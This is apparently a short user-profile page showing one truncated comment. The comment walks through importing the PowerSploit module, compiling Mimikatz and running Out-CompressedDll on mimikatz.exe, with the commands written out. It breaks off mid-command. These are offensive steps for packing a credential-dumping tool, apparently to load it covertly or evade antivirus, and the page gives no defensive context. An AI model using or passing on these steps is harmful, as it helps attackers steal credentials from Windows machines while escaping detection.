ineffectivecoder
Results
1
comments of
ineffectivecoder
Import Powersploit module from here: [Powersploit](https://github.com/PowerShellMafia/PowerSploit) ``` Import-Module .\PowerSploit.psd1 ``` Compile new Mimikatz... I'll leave that to you. Run Out-COmpressedDll against mimikatz.exe and dump to text file ``` Out-CompressedDll .\mimikatz.exe...